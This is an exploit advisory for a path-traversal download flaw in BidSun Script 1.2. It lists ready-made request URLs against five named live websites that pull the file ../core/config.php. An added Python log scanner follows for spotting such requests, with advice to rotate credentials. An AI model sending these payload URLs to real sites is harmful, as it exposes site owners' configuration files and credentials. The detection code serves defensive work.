BidSun Script Local File Download Vulnerability

2016.01.13
Credit: Milad Hacking
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/***********************************************************************************
** Exploit Title: BidSun Script Local File Download Vulnerability
** Exploit Author: FullSecurity.org
** Discovered By: Milad Hacking
** Vendor Homepage : http://bidsun.ir/
** Demo Script Link: http://bidsun.ir/demo/
** Version : 1.2
** Date: 2016-01-13
** Tested on: Kali Linux / Iceweasel
***********************************************************************************
** Demo :
http://knownsunknowns.com/index.php?mod=download&met=downFile&fileName=../core/config.php
http://boloorbook.com/index.php?mod=download&met=downFile&fileName=../core/config.php
http://arman.rahimzadeh.ir/index.php?mod=download&met=downFile&fileName=../core/config.php
http://www.waresin.ir/index.php?mod=download&met=downFile&fileName=../core/config.php
http://www.touristban.com/index.php?mod=download&met=downFile&fileName=../core/config.php
***********************************************************************************
** Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi - irhblackhat - distr0watch - N3TC4T - Mohamad Nofozi - Mr.G}{o$t - s4livan - MRS4JJ4D - SeCrEt_HaCkEr - Xodiak Blackhat - Shadow_Walker <3
***********************************************************************************
https://telegram.me/thehacking
http://FullSecurity.org
milad.hacking.blackhat@Gmail.com
***********************************************************************************
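
Operators of affected sites can search web-server access logs for the request pattern shown in the demo URLs (mod=download, met=downFile, and a fileName value that climbs out of the download directory). The following is an added example, not part of the original advisory or the vendor's code; the combined log format, the function names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field of a combined-format access log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable, in case a proxy or the app decodes more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal_download(request_target):
    """True if a mod=download / met=downFile request has a fileName that leaves its directory."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if "download" not in params.get("mod", []) or "downFile" not in params.get("met", []):
        return False
    for raw in params.get("fileName", []):  # parse_qs has already decoded once
        name = fully_decode(raw).replace("\\", "/")
        # Flag absolute paths, NUL bytes, and any ".." path segment.
        if name.startswith("/") or "\x00" in name or ".." in name.split("/"):
            return True
    return False

def scan(lines):
    """Return the log lines whose request matches the advisory's download pattern."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and is_traversal_download(match.group(1)):
            hits.append(line)
    return hits

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jan/2016:10:00:01 +0000] "GET /index.php?mod=download&met=downFile&fileName=catalog.pdf HTTP/1.1" 200 48211',
    '198.51.100.7 - - [13/Jan/2016:10:02:14 +0000] "GET /index.php?mod=download&met=downFile&fileName=../core/config.php HTTP/1.1" 200 912',
    '198.51.100.7 - - [13/Jan/2016:10:02:20 +0000] "GET /index.php?mod=download&met=downFile&fileName=..%2Fcore%2Fconfig.php HTTP/1.1" 200 912',
    '192.0.2.33 - - [13/Jan/2016:10:05:40 +0000] "GET /index.php?mod=news&id=4 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT", hit)
```

A hit with a 200 status on a request for ../core/config.php means the configuration file was likely served, so any credentials stored in it should be rotated.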

References:

http://FullSecurity.org



Copyright 2020, cxsecurity.com

 
